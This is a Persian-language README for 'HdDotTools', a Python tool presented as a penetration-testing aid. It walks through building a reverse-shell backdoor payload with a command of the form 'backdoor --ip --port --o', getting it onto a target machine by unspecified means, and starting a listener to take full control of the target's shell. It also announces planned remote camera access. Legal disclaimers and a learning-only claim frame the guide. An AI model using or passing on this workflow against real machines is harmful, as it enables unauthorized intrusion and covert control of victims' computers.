آموزش ابزار HdDotTools
Develops by AltSafe
این یک ابزار تست نفوذ است
این ابزار به شما امکان میدهد که تست نفوذ انجام بدهید در ویندوز و
به ترمینال یا همون شل سیستم مورد نظرتون دسترسی پیدا میکنید
این ابزار فقط برای درک بهتر مبانی شبکه ساخته شده است !
به هیچ عنوان از این ابزار استفاده ی غیر اخلاقی نکنید
AltSafe هیچ مسئولیتی بابت استفاده ی بد شما از این ابزار ندارد
جرایم:
طبق قانون جمهوری اسلامی ایران ماده 1 جرایم یارانه ای
هرکس به طور غیرمجاز به دادهها یا سامانههای رایانهای
یا مخابراتی که به وسیله تدابیر امنیتی حفاظت شدهاند
دسترسی پیدا کند، مرتکب جرم شده است.و به حبس از ۹۱ روز تا یک سال
یا جزای نقدی از ۵ میلیون تا ۲۰ میلیون ریال
یا هر دو مجازات محکوم میشود.
نحوه اجرا:
ابتدا باید پایتون ورژن 3.6 به بالا را روی سیستمتان نصب داشته باشید
سپس هر سه تا فایل را دانلود کنید و داخل یک پوشه قرار دهید
سپس ترمینال را در آن فولدر باز کنید
برای اینکار در ویندوز لازم است روی آدرس بار فایل اکسپلورر
کلیک کرده و cmd را تایپ کنید .
سپس باید پایتون را با فایل HdDotTools فراخوانی کرده
پایتون توی سیستم های مختلف فراخوانی اش به 3 بخش تقسیم میشود
python یا python3 یا py
سپس پایتون را فراخوانی کنید و اسم فایل
برای مثلا python HdDotTools.py
وقتی که اسم HdDotTools را دیدید بعد از اجرا یعنی ابزار درست اجرا شده
نحوه ی کار:
این برنامه دو نوع خط ترمینال دارد: hdt و backdoor
خط کد اصلی برنامه hdt میباشد و backdoor برای ساخت payload
این برنامه 100% با پایتون نوشته شده است و درحال حاظر
این برنامه ورژن 1.0.1 هستش که در این نسخه فقط امکان reverse shell
وجود دارد. این نوع تست نفوذ یکی از مرسوم ترین نوع ها بوده و هست
که ترمینال سیستم عامل تارگت رو به طور 100% در اختیارتان میذاره
در آپدیت های بعدی قصد داریم امکان live camera رو اضافه کنیم
این ابزار برای شما یک فایل آلوده (پیلود) میسازد که باید
در سیستم عامل تارگت اجراش کنید . در عین حال باید کامپیوترتان
اماده به گرفتن اطلاعات از کامپیوتر تارگت باشد یا همون حالت listening
وقتی که کامپیوتر شما روی حالت لیستنینگ باشد و پیلود در سیستم عامل تارگت
اجرا شود کامپیوتر تارگت یک اتصال معکوس به ایپی که شما برایش تعریف کرده اید
میزند که باید همون کامپیوتر شما باشد و از طریق پورت تعریف شده در پیلود.
از این بع بعد شما به shell سیستم عامل تارگت دسترسی دارید و میتونید هرکاری
که بخواید باهاش انجام دهید .
اموزش استفاده:
بعد از اجرای ابزار یک لوگویی پرینت میشود که نشان دهنده ی این است
که ابزار درست اجرا شده و مشکلی ندارد و بهتون یک خط فرمان نشان میدهد
در خط فرمان اصلی hdt شما برای ساخت پیلود باید اول وارد محیط سازنده اش بشوید
برای اینکار دستور su را تایپ کرده تا وارد حالت backdoor شوید و payload بسازید
برای ساختن پیلود کافی است طبق این قاعده که نوشتم پیش بروید
backdoor --ip YourPcIP --port YourPort --o YourPayloadSaveLocation
و بعد از اینکار دکمه ی control + c یا بنویسید back را بزنید
سپس شما به حالت اصلی یا همون hdt می آیید
بعدش باید اون پیلود رو یه طوری به کامپیوتر تارگت منتقل کنید
بعدش باید در همون خط فرمان اصلی یا hdt بنویسید startserver
سپس از شما ایپی میخواهد ایپی که به پیلود دادید را اینجا وارد کنید
توجه: در این نسخه یعنی 1.0.1 اینجا باگ دارد و بهتر است همونجا اینتر بزنید
وقتی که اینتر بزنید روی همه ی حالات یعنی ایپی لوکال و ایپی پابلیک گوش میدهد
بعد از اینکه روی اینترفیس دیفالتش یعنی 0.0.0.0 اینتر زدید به بخش پورت میرسید
در بخش پورت دقیقا همان پورتی را که در بخش ساخت پیلود وارد کردید
اینجا هم وارد کنید
سپس تایپ کنید "y" برای ادامه و استارت حالت listening
و الان دقیقا وقت اجرای پیلود در سیستم عامل تارگت است
و وقتی که اجراش کنید اگر تمامی مراحل رو به درستی رئایت کرده باشید
سیستم عامل تارگت به سیستم عامل شما یک اتصال میزند
و شما حالا کامپیوتر تارگت را در دست دارید
نکات مهم:
حتما دقت داشته باشید که فقط برای تست دارید اینکارا میکنید
و در مکان های واقعی و حساس دور از لب هایتان انجام اینکار
جرم است
حتما دقت داشته باشید که ایپی که میدهید ایپی خودتان است
حتما دقت داشته باشید که پورتی که میدهید باز باشد